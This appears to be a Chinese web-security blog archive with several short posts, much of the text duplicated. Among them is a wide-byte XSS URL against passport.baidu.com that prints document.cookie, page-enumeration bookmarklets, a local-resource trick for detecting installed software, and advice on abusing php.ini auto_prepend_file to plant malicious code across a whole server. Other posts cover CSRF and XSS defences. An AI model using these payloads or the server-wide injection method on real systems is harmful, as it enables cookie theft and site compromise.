Apr
1
上次提到了此处 http://www.woyigui.cn/hi-baidu-jump/,百度修复了简单的利用方法,但是却没有修复宽字节漏洞。造成一个XSS漏洞。测试URL:
页面输出:
http://passport.baidu.com/ubrwsbas?u_jump_url=%bf%22;alert(document.cookie);</script>
页面输出:
<script>
document.domain="baidu.com";
var spRef = "縗";alert(document.cookie);</script>";
document.domain="baidu.com";
var spRef = "縗";alert(document.cookie);</script>";
Mar
31
一、 描述
该程序用于防范Riding/CSRF 的攻击。
二、 使用方法
首先下载该系统:http://projects.playhack.net/project.php?id=3,然后在需要防范的PHP页面内包含该文件,假如我的表单文件是seride_test.php,接收表单的是seride_recv.php,那么,我可以这样做:
seride_test.php:
该程序用于防范Riding/CSRF 的攻击。
二、 使用方法
首先下载该系统:http://projects.playhack.net/project.php?id=3,然后在需要防范的PHP页面内包含该文件,假如我的表单文件是seride_test.php,接收表单的是seride_recv.php,那么,我可以这样做:
seride_test.php:
<?PHP
include("seride.php");
?>
<div align="center">
<form name="login" action="seride_recv.php" method="POST">
<input name="test" type="text" >
<input type="submit">
<?=seride_form();?>
</form>
</div>
include("seride.php");
?>
<div align="center">
<form name="login" action="seride_recv.php" method="POST">
<input name="test" type="text" >
<input type="submit">
<?=seride_form();?>
</form>
</div>
Mar
31
获取页面所有链接
javascript:var h="";for ( i = 0; i< document.links.length; i++ ) h+=document.links(i).href+"<br/>";x=window.open("about");x.document.write(h);
获取页面所有框架
javascript:var h="";for ( i = 0; i< document.links.length; i++ ) h+=document.frames(i).name+"<br/>";x=window.open("about");x.document.write(h);
获取页面所有图片地址
javascript:var h="";for ( i = 0; i< document.images.length; i++ ) h+=document.images(i).src+"<br/>"+"<img src=\'"+document.images(i).src+"\'/>"+"<br />";x=window.open("about:blank");x.document.write(h);
获取页面所有脚本地址
javascript:var h="";for ( i = 0; i< document.scripts.length; i++ ) h+=document.scripts(i).src+"<br/>";x=window.open("about");x.document.write(h);
javascript:var h="";for ( i = 0; i< document.links.length; i++ ) h+=document.links(i).href+"<br/>";x=window.open("about");x.document.write(h);
获取页面所有框架
javascript:var h="";for ( i = 0; i< document.links.length; i++ ) h+=document.frames(i).name+"<br/>";x=window.open("about");x.document.write(h);
获取页面所有图片地址
javascript:var h="";for ( i = 0; i< document.images.length; i++ ) h+=document.images(i).src+"<br/>"+"<img src=\'"+document.images(i).src+"\'/>"+"<br />";x=window.open("about:blank");x.document.write(h);
获取页面所有脚本地址
javascript:var h="";for ( i = 0; i< document.scripts.length; i++ ) h+=document.scripts(i).src+"<br/>";x=window.open("about");x.document.write(h);
当然,还有其他一些集合和更多的集合属性,有更大的发展空间。有时候可以做些对页面进行扫描,收集,测试等操作,这些用处就大了。比如:xss、csrf等。。。
Mar
19
将以下代码保存html,放在Firefox访问:
正题:
上面的脚本是不是造成页面一直刷新,而放在IE中却无事。那么好,我建立如下html:
在Firefox 下访问,页面会跳转到 http://microsoft.com。
在IE 下访问,就会包含我的2.html,显示出来,不会跳转。
根据DHTML手册中说:
此例脚本中,我们只是定义了一个 location 变量,将其赋值,而FF不单将他赋值了,而且还将他执行了,这仅仅是一个变量。但是因为我们定义的变量名字特殊,不太符合变量的要求,不应该将“关键字”定义成变量名。而对于 IE 来说,他却没有执行,只做了一个简单的赋值操作。
有些时候必须注意这些,就像今天,有人将其赋值为空,他觉得是初始化,但是这样,在FF中执行,就会成为一个“死循环”!
<script>var location='' </script>
正题:
上面的脚本是不是造成页面一直刷新,而放在IE中却无事。那么好,我建立如下html:
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>1111111</title>
<script>
var location='http://microsoft.com'
</script>
</head>
<body>
<iframe src="2.html" name="searchframe" id="searchframe" >
</body>
</html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />
<title>1111111</title>
<script>
var location='http://microsoft.com'
</script>
</head>
<body>
<iframe src="2.html" name="searchframe" id="searchframe" >
</body>
</html>
在Firefox 下访问,页面会跳转到 http://microsoft.com。
在IE 下访问,就会包含我的2.html,显示出来,不会跳转。
根据DHTML手册中说:
location 对象的默认属性就是 location.href。例如,设置 location='http://microsoft.com' 的结果就等于设置 location.href='http://microsoft.com'。
当设置此列出的任何属性后,浏览器都将立即前往指定 URL。
当设置此列出的任何属性后,浏览器都将立即前往指定 URL。
此例脚本中,我们只是定义了一个 location 变量,将其赋值,而FF不单将他赋值了,而且还将他执行了,这仅仅是一个变量。但是因为我们定义的变量名字特殊,不太符合变量的要求,不应该将“关键字”定义成变量名。而对于 IE 来说,他却没有执行,只做了一个简单的赋值操作。
有些时候必须注意这些,就像今天,有人将其赋值为空,他觉得是初始化,但是这样,在FF中执行,就会成为一个“死循环”!
Mar
19
一种方法,但是效果不佳!
大家都知道,在一个程序里面,会包含一些资源,如果里面有图片资源的话,我们就可以弄一个图片,src本地程序里面的资源,如果onerror,就说明没有安装,但是如果程序有可能在D盘,E盘或者其他路径安装,这样就不行了,必须默认路径才。如果程序开发者无论程序装在哪一个盘,都会向一个固定本地目录释放一张图片,用于判断多好!当然了,还是判断 http头部最好了,简单有效。
测试一下360浏览器:
<img src="res://c:\Program Files\360\360se\360SE.exe/AB.GIF" onerror=alert('没有安装360浏览器') >
大家都知道,在一个程序里面,会包含一些资源,如果里面有图片资源的话,我们就可以弄一个图片,src本地程序里面的资源,如果onerror,就说明没有安装,但是如果程序有可能在D盘,E盘或者其他路径安装,这样就不行了,必须默认路径才。如果程序开发者无论程序装在哪一个盘,都会向一个固定本地目录释放一张图片,用于判断多好!当然了,还是判断 http头部最好了,简单有效。
测试一下360浏览器:
Mar
17
<?PHP
function RemoveXSS($val) {
// remove all non-printable characters. CR(0a) and LF(0b) and TAB(9) are allowed
// this prevents some character re-spacing such as <java\0script>
// note that you have to handle splits with \n, \r, and \t later since they *are* allowed in some inputs
$val = preg_replace('/([\x00-\x08,\x0b-\x0c,\x0e-\x19])/', '', $val);
Mar
13
昨天和一个朋友讲解函数的概念,无意中说了这样的比喻:
把人看成一个程序,把大脑当成主函数(main),把身体各个部位的器官看成一个一个的函数,每个器官都有各自的功能。当大脑向各个器官发送调用命令时,该器官就会做出反应,完成自身的功能,当完成后返回执行成功命令传给大脑,一个函数调用完成。比如:当吃饭时,由大脑向嘴发出指令,然后由嘴去完成吃这个动作,当嘴完成吃这个动作后,就后通知大脑说,我已吃到,返回一条TRUE的命令,这时大脑再调用其他器官。同样的,走路、闭眼、坐下等这些功能都是相应的由函数:腿、眼睛、屁股来完成功能的。并且,每一器官完成动作之后可以返回是否执行完成,也就是返回值。一般的,当执行完成后,都会返回的,但也可能会出现异常,不是由大脑去支配的,比如条件反射。
如果把程序看成一个人,那么这个程序也可以按性格、修养、特长、功能等多个方面来描述。一个程序按照条理也可用人的生活来描述,可以是杂乱无章,也可以是井井有条。也可以同人和能力来相比,可以有小到显示时间的,也有大到操作系统的。也有攻击软件,同样也样防护软件,等同于好人与坏人。如果一个程序不完整,或者是功能不完整,那就是残疾人了。
在《代码大全》中也这样提到:“当去理解某一事物时,可适当的采用隐喻等方法去理解,将会产生很好的效果!”
把人看成一个程序,把大脑当成主函数(main),把身体各个部位的器官看成一个一个的函数,每个器官都有各自的功能。当大脑向各个器官发送调用命令时,该器官就会做出反应,完成自身的功能,当完成后返回执行成功命令传给大脑,一个函数调用完成。比如:当吃饭时,由大脑向嘴发出指令,然后由嘴去完成吃这个动作,当嘴完成吃这个动作后,就后通知大脑说,我已吃到,返回一条TRUE的命令,这时大脑再调用其他器官。同样的,走路、闭眼、坐下等这些功能都是相应的由函数:腿、眼睛、屁股来完成功能的。并且,每一器官完成动作之后可以返回是否执行完成,也就是返回值。一般的,当执行完成后,都会返回的,但也可能会出现异常,不是由大脑去支配的,比如条件反射。
如果把程序看成一个人,那么这个程序也可以按性格、修养、特长、功能等多个方面来描述。一个程序按照条理也可用人的生活来描述,可以是杂乱无章,也可以是井井有条。也可以同人和能力来相比,可以有小到显示时间的,也有大到操作系统的。也有攻击软件,同样也样防护软件,等同于好人与坏人。如果一个程序不完整,或者是功能不完整,那就是残疾人了。
在《代码大全》中也这样提到:“当去理解某一事物时,可适当的采用隐喻等方法去理解,将会产生很好的效果!”
Mar
12
发现转载只复制内容,转载请声明来源!!
本来这两天研究PHPIDS,使用文件是:当要在防止页面攻击时,可在页面的头部include防攻击文件,就像通用防注入文件。我们可以用三种情况来办到:
1、在每个文件内引用。这样的文件是可以,不过如果一个网站内有几百个文件的话就不方便了。
2、在共同包含文件内引用一下,比如 config.inc.php。这是一个好办法,也是目前市场上比较流行的做法。
3、在php.ini中引用。在配置文件内引用的话,将影响到所以的网站,包含所有页面,这就像当年流行的一些免费空间商,当你免费开通一个ftp空间,上传网站以后,空间内会出现广告一样。不知道是不是这种方法,但是目的是一样的。这样做的好处是:如果是一个公司或者是一个企业内部网站的话,即安全,维护也方便。
前两种方法大家都清楚,第三种就是在php.ini中,找到此节:
默认是空,请添加所包含的文件。同时找到:
因为我的是win环境,所以开启了windows选项,包含路径可自由修改。
同时,这样的功能也为我们攻击也造成了方便,比如挂马。现在“市场”上也有很多的挂马技巧,就不多说了。我们可以利用auto_prepend_file选项,来批量挂马了,可以将整个服务器上的网站挂上,优点为:不影响速度、不修改文件、方法新颖。 缺点为:必须对php.ini有写权限。
本来这两天研究PHPIDS,使用文件是:当要在防止页面攻击时,可在页面的头部include防攻击文件,就像通用防注入文件。我们可以用三种情况来办到:
1、在每个文件内引用。这样的文件是可以,不过如果一个网站内有几百个文件的话就不方便了。
2、在共同包含文件内引用一下,比如 config.inc.php。这是一个好办法,也是目前市场上比较流行的做法。
3、在php.ini中引用。在配置文件内引用的话,将影响到所以的网站,包含所有页面,这就像当年流行的一些免费空间商,当你免费开通一个ftp空间,上传网站以后,空间内会出现广告一样。不知道是不是这种方法,但是目的是一样的。这样做的好处是:如果是一个公司或者是一个企业内部网站的话,即安全,维护也方便。
前两种方法大家都清楚,第三种就是在php.ini中,找到此节:
; Automatically add files before or after any PHP document.
;auto_prepend_file = "phpids.php"
;auto_append_file = "alert.php"
;auto_prepend_file = "phpids.php"
;auto_append_file = "alert.php"
默认是空,请添加所包含的文件。同时找到:
; UNIX: "/path1:/path2"
;include_path = ".:/php/includes"
;
; Windows: "\path1;\path2"
include_path = ".;F:\PHPnow\htdocs"
;include_path = ".:/php/includes"
;
; Windows: "\path1;\path2"
include_path = ".;F:\PHPnow\htdocs"
因为我的是win环境,所以开启了windows选项,包含路径可自由修改。
同时,这样的功能也为我们攻击也造成了方便,比如挂马。现在“市场”上也有很多的挂马技巧,就不多说了。我们可以利用auto_prepend_file选项,来批量挂马了,可以将整个服务器上的网站挂上,优点为:不影响速度、不修改文件、方法新颖。 缺点为:必须对php.ini有写权限。
